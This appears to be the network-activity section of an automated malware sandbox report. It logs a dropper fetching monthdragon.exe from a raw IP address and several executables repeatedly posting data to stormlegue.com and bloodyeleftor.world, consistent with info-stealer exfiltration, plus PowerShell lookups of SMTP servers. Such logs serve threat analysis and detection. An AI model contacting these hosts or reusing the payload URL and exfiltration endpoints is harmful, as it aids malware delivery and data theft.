                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43323&min_rtt=41928&rtt_var=7981&sent=14&recv=11&lost=0&retrans=0&sent_bytes=8837&recv_bytes=1060&delivery_rate=223642&cwnd=255&unsent_bytes=0&cid=b56f5dbc4961837e&ts=382&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=I966PKGDH1FN0P98AL
                                                                                              Cookie: __cf_mw_byp=dft4D3C583KGDOmib_4ps1U4I78YMNqbdR5m2Z_DxZQ-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1671
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=s2tijhcts9eqfg5houaif0vv91; expires=Fri, 21 Feb 2025 00:34:28 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=331kad3CblRkoqqlSLyvI7R9PD8mcJdXNEHMVVVXzLEjg9vg2HTekgCZHXLoP6etDvGgBbUsFLoo4szdmqVFLtAyKqykepkRkVI2MEPyG9LfCngyl4CKNVnzruyGjBjamg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69421b1b7717-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=45029&min_rtt=41928&rtt_var=9397&sent=17&recv=15&lost=0&retrans=0&sent_bytes=10010&recv_bytes=3157&delivery_rate=223642&cwnd=255&unsent_bytes=0&cid=b56f5dbc4961837e&ts=620&x=0"
                                                                                             •
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6021j8cybDUPtljyP07oELXGOxleW%2F2POCuZO%2Fkx75EXqxgb6fud2iLpS2%2Br5tbJgqm5zhXJUE42y8lD1QO0Ls9k1iUCiKiUPnoukJuXfN%2FBBVbpyag4h7CmtSEY5GbylO%2FcB0pQ"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69412bf877a1-LHR
                                                                                             •
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=SEdkkyVCSLWCgbR5Zko9mEEYFmBcSaifauxYpKFC628-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 45
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=musm5rt06fddv2pe49fcc4o97g; expires=Fri, 21 Feb 2025 00:34:28 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZKiAsEmmefZUraZGfutdhTRvcEys6vYkMMKGAxA%2FYMOG0Z5%2BCXumMxuZe6JYSTdzo%2FIE0Bfl4MPqRxYCE3%2FvM9NytF0HkVcNm2%2FpxQJNC2T%2FgzrA4n6DcTAABK5jWAq4lUmhJRU"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69419ce777a1-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43936&min_rtt=41920&rtt_var=11389&sent=13&recv=10&lost=0&retrans=0&sent_bytes=8580&recv_bytes=1070&delivery_rate=178150&cwnd=253&unsent_bytes=0&cid=ff1ede99d49b57a1&ts=383&x=0"
                                                                                             •
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=YSPU02C2
                                                                                              Cookie: __cf_mw_byp=SEdkkyVCSLWCgbR5Zko9mEEYFmBcSaifauxYpKFC628-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1613
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=vhacvu4totdd6801gecq6t61pg; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ez5g%2Fa4Jofq81nO8y%2B2skAkiAJjDQkDD3Y%2B8cF8wAunLSYhauBQGbQJzbIV1njowET75wEeciKf5%2F6pdxcyJuDgCcPcQYNPp4KOYudhQAim7tLl6KTXLWqVH%2BpRykKmpaYi6vj1x"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69436fb977a1-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44204&min_rtt=41920&rtt_var=9077&sent=17&recv=14&lost=0&retrans=0&sent_bytes=9758&recv_bytes=3104&delivery_rate=178150&cwnd=253&unsent_bytes=0&cid=ff1ede99d49b57a1&ts=652&x=0"
                                                                                             •
                                                                                              DNS
                                                                                              google.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              google.com
                                                                                              IN MX
                                                                                              Response
                                                                                              google.com
                                                                                              IN MX
                                                                                               smtp
                                                                                             •
                                                                                              DNS
                                                                                              smtp.google.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              142.250.27.27
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              142.250.102.26
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              142.250.27.26
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              142.250.102.27
                                                                                             •
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=PF1XG8C11K50AMUK3
                                                                                              Cookie: __cf_mw_byp=dft4D3C583KGDOmib_4ps1U4I78YMNqbdR5m2Z_DxZQ-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1112
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=mrq3bkcoqsda380jfourdrrn64; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T26j3PJFxNfFDnLUyqtG8P4itgt3cVmBG%2BO6igpZsYciJ1Z7VK68v7aEbX%2F1uYn5EH1lXBfFm%2F75nLctvOiyf4UqDOF3DBPz%2FiubVIr0cvz77Jqc67ZpQypyWtZYo1aScw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69447a4acd82-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=45955&min_rtt=44313&rtt_var=13781&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3564&recv_bytes=1811&delivery_rate=91869&cwnd=248&unsent_bytes=0&cid=f54236d025a4430e&ts=315&x=0"
                                                                                             •
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=N5YM52MNA1LUA
                                                                                              Cookie: __cf_mw_byp=SEdkkyVCSLWCgbR5Zko9mEEYFmBcSaifauxYpKFC628-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1078
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=no97tlrrov3bqmk8nd8314jh1m; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGH7YUIPYLyCx7%2BijEfpm1Po0P27s6AIorOq9gTcW8Bh6t76X15VeX6ukqbUObnpCxTfCKnQ8GrpxS9zGH34YwAya220dSvPZRRDK7LvL9xqITStIvOyfx7A9M9jjIq%2FFl8W1S5X"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6945fe9f945a-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44675&min_rtt=42273&rtt_var=13992&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3307&recv_bytes=1783&delivery_rate=96302&cwnd=253&unsent_bytes=0&cid=79463cfbc082d36e&ts=315&x=0"
                                                                                             •
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=dft4D3C583KGDOmib_4ps1U4I78YMNqbdR5m2Z_DxZQ-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 84
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=gfflb536jaiu6bu6qjng1a7bhr; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AqBtVTVqLvh9R%2FmrDsX%2FCqArNRB2h6r%2BaksvKUA5omYt4lrjIf2HeydFqfnCqqGRD7W4hIinR%2BVsLRpM5qlP5qxbFHyBkNFj5ItmO7QijyEcbGmL%2BA0%2BhS07wf5xheoDQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6946fc56cd82-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42701&min_rtt=42137&rtt_var=9915&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=767&delivery_rate=93354&cwnd=248&unsent_bytes=0&cid=55bfd5d2b11b0a19&ts=211&x=0"
                                                                                             •
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=SEdkkyVCSLWCgbR5Zko9mEEYFmBcSaifauxYpKFC628-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 80
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=ig29mf68dbjsfutkminrl26i6a; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XuXC1JFGjBt5Tn7aJ%2F9CxsZYetNHqfcWBDUFHZ0ksJ6bqVRU4OipEgBnXK6OChCoifTwnh%2F5zIP1ZDwpRgWVa89VeKLZvrsrjqT87Ix5ce2pzX0vIP8blcAzVHzAl3xxw2kpD7wh"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69487815945a-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42377&min_rtt=41992&rtt_var=9426&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3308&recv_bytes=773&delivery_rate=93000&cwnd=253&unsent_bytes=0&cid=acc6a4a70ffaa71f&ts=259&x=0"
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.97/files/FuckMAIN/monthdragon.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.97:80
                                                                                              Request
                                                                                              GET /files/FuckMAIN/monthdragon.exe HTTP/1.1
                                                                                              Host: 185.215.113.97
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:31 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 353280
                                                                                              Last-Modified: Sun, 16 Feb 2025 19:42:58 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b23fc2-56400"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-us
                                                                                              DNS
                                                                                              naturewsounds.help
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              naturewsounds.help
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:34:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OdFmJQl5t%2Frlrz4xIanefo5JTpK6D58pgo7XGaPZYQYq7TQyr6tIovJK54jqqdRZBcfe3CV2T6a8VzJHX1njcHz6W1Nnu08kHLsqtzgc2n4gvdRJ7IOllGLTxTerHTH8xQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69599dad0339-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=3G7ToUNrxDd4qF0kc46UBej1TR453eaczPLMySuxgrQ-1740011672-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 53
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=ec072r3pldmgj5k4nmv1cgrkk9; expires=Fri, 21 Feb 2025 00:34:32 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UtZMHQDURj%2BRI5BaPVjqvzNcnANBzH9s%2FAc3zktWAfAqsk6P1bkhmA%2FSSnMHKUX5kMWVysTuEq3l6XoKlBznchsb0W4RgZLb8Anlp5FMXvd%2FgnA797TRsLBKhCj1yTlN5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6959fe2b0339-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44935&min_rtt=42007&rtt_var=13822&sent=14&recv=10&lost=0&retrans=0&sent_bytes=8830&recv_bytes=1063&delivery_rate=217353&cwnd=253&unsent_bytes=0&cid=3c627abbafc3fa93&ts=308&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=PG058E5YD88Y3RMW7
                                                                                              Cookie: __cf_mw_byp=3G7ToUNrxDd4qF0kc46UBej1TR453eaczPLMySuxgrQ-1740011672-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1657
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=fqh0qa4p1suhsdu3v4nkkvm8es; expires=Fri, 21 Feb 2025 00:34:32 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zcGC7WFzLVkHjq7yIR%2B9aS8oYdFo9tJvR9k4%2Fot0sUuGd6uPGLHChisQ5R5OarUKVPzHgHJxRa9OWBRrcLlYa1x%2F6ZgyK4BdQqb%2BgXP6hvvVVdEIyK5ecE2kis%2BZSvvvGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a695b480b0339-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44572&min_rtt=41998&rtt_var=11093&sent=17&recv=14&lost=0&retrans=0&sent_bytes=10004&recv_bytes=3145&delivery_rate=217353&cwnd=253&unsent_bytes=0&cid=3c627abbafc3fa93&ts=507&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=L4V30WR81YSD
                                                                                              Cookie: __cf_mw_byp=3G7ToUNrxDd4qF0kc46UBej1TR453eaczPLMySuxgrQ-1740011672-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1085
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=l48aj7t5ao1ep01ndug0u8vk4e; expires=Fri, 21 Feb 2025 00:34:33 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kA9%2FrP%2F%2BTnPKwuchxPYxT2l7f5uNgh7NH9cnK%2FssbU02BwKSfiF30zbFOp%2FdSHPp%2BDHk5LEWU%2Fe15II17QRfD3qCECbDkuwT49jPpZdot13uJp2KQPZHyFGa9bcwXovMCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a695d7f1c94ab-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42791&min_rtt=41961&rtt_var=9360&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3566&recv_bytes=1779&delivery_rate=93174&cwnd=253&unsent_bytes=0&cid=82925ff5c1525347&ts=332&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              monthdragon.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=3G7ToUNrxDd4qF0kc46UBej1TR453eaczPLMySuxgrQ-1740011672-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=6s7s90iaco6evu9dmrgqpobchp; expires=Fri, 21 Feb 2025 00:34:33 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLmPK84vD%2FmStFQHgyDA5hrWxdXt7rKiSriLCKHiXT7%2Bviqc5yd38XK85hvM5pImW%2FQNTmPGkwe8MNB%2Fdb5Nh1R8IyWlL5oveWrXKkhShtLX8vEev7EEqIiUbwFvfqXPzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a696018db0339-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
